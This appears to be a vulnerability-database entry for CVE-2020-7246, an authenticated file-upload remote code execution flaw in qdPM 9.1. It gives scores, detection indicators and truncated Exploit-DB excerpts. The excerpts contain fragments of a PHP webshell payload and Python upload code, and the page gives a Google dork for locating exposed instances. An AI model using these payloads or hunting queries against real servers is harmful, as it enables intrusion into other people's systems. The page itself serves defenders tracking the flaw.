CVE-2020-7246
Published 2020-01-21
Priority: P2 · 77 · CVSS 3.1 base score 8.8 (High)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit available · EPSS 83.23% (99.6th percentile)
A remote code execution (RCE) vulnerability exists in qdPM 9.1 and earlier. An attacker can upload a malicious PHP code file via the profile photo functionality, by leveraging a path traversal vulnerability in the users['photop_preview'] delete photo feature, allowing bypass of .htaccess protection. NOTE: this issue exists because of an incomplete fix for CVE-2015-3884.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| qdpm | qdpm | <= 9.1 | — |
Detection & IOCs (extracted from sources)
- Detect path traversal in the users[photo_preview] POST parameter: values containing '../' sequences targeting .htaccess deletion are a strong indicator of CVE-2020-7246 exploitation.
- Monitor POST requests to 'index.php/myAccount/update' that include a multipart file upload with a PHP file (Content-Type: application/octet-stream) as the users[photo] field.
- Detect PHP webshell execution attempts via GET requests to '/uploads/users/*.php?cmd='; this path is where the malicious file lands after upload.
- Use the Google Dork pattern as a hunting query to identify exposed qdPM 9.1 instances: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
- Uploaded PHP files in /uploads/users/ are renamed with a numeric prefix (e.g., 1584009-webshell.php). Alert on any .php file appearing under this directory.
- Exploitation requires valid credentials for at least one non-admin user account. The designated admin account cannot be used because it lacks a myAccount page.
- This CVE is an incomplete fix for CVE-2015-3884; installations that applied the prior patch may still be vulnerable if running qdPM 9.1 or earlier.
CVSS provenance
- NVD, CVSS v3.1: 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 6.5 MEDIUM (AV:N/AC:L/Au:S/C:P/I:P/A:P)
No detection rules found.
Exploit-DB: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) (v2)
exploitdb · 2022-05-25 · CVSS 8.8 · CVE-2020-7246 [HIGH]
---
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954 (https://www.exploit-db.com/exploits/47954)
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>', 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.ge
Exploit-DB: qdPM 9.1 - Remote Code Execution (Authenticated)
exploitdb · 2021-08-04 · CVSS 8.8 · CVE-2020-7246 [HIGH]
---
# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2021-08-03
# Original Exploit Author: Rishal Dwivedi (Loginsoft)
# Original ExploitDB ID: 47954
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME +
'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
url = HOSTNAME + '/index.php/login'
result = session_requests.get(url)
#print(result.text)
login_tree = html.fromstrin
Exploit-DB: qdPM < 9.1 - Remote Code Execution
exploitdb · 2020-02-28 · CVSS 8.8 · CVE-2020-7246 [HIGH]
---
#!/usr/bin/python
#-------------------------------------------------------------------------------------
# Title: qdPM Webshell Upload + RCE Exploit (qdPMv9.1 and below) (CVE-2020-7246)
# Author: Tobin Shields (@TobinShields)
#
# Description: This is an exploit to automatically upload a PHP web shell to
# the qdPM platform via the "upload a profile photo" feature.
# This method also bypasses the fix put into place from a previous CVE
#
# Usage: In order to leverage this exploit, you must know the credentials of
# at least one user. Then, you should modify the values highlighted below.
# You will also need a .php web shell payload to upload. This exploit
# was built and tested using the PHP script built by pentestmonkey:
# https://github.com/pentest
Exploit-DB: qdPM 9.1 - Remote Code Execution
exploitdb · 2020-01-23 · CVSS 8.8 · CVE-2020-7246 [HIGH]
---
# Exploit Title: qdPM 9.1 - Remote Code Execution
# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
# Date: 2020-01-22
# Exploit Author: Rishal Dwivedi (Loginsoft)
# Vendor Homepage: http://qdpm.net/
# Software Link: http://qdpm.net/download-qdpm-free-project-management
# Version: "; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo ""; die; }?>'
, 'application/octet-stream'),
}
upload_req = session_requests.post(HOSTNAME
+ 'index.php/myAccount/update', files=request_3)
def main(HOSTNAME, EMAIL, PASSWORD):
result = session_requests.get(HOSTNAME + '/index.php/login')
login_tree = html.fromstring(result.text)
authenticity_token = \
list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value"
)))[0]
payload = {'login[email]': EMAIL, 'l
Metasploit: qdPM 9.1 Authenticated Arbitrary PHP File Upload (RCE)
metasploit · CVSS 8.8 · CVE-2015-3884 [HIGH]
No writeups or analysis indexed.
References
- http://packetstormsecurity.com/files/156063/qdPM-9.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/156571/qdPM-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/167264/qdPM-9.1-Remote-Code-Execution.html
- http://packetstormsecurity.com/files/168559/qdPM-9.1-Authenticated-Shell-Upload.html
- https://docs.google.com/document/d/13ZZSm0DL1Ie6r_fU5ZdDKGZ4defFqiFXMG--zDo8S10/edit?usp=sharing